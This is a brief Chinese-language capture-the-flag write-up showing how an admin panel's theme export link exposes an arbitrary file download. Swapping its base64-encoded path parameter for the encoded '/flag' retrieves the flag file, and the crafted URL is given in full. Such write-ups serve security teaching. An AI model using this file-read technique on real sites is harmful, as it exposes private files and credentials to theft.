找到网站后台中的 导出文件
按钮:
复制他的下载链接,例如:
https://123123.men/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=
看到一串base64编码: L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=
解密出来的结果:
猜测可能存在任意文件下载,将 /flag
base64编码( L2ZsYWc=
)加入到url中
https://123123.men/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=
下载了 flag.zip
文件,修改后缀为txt打开拿到flag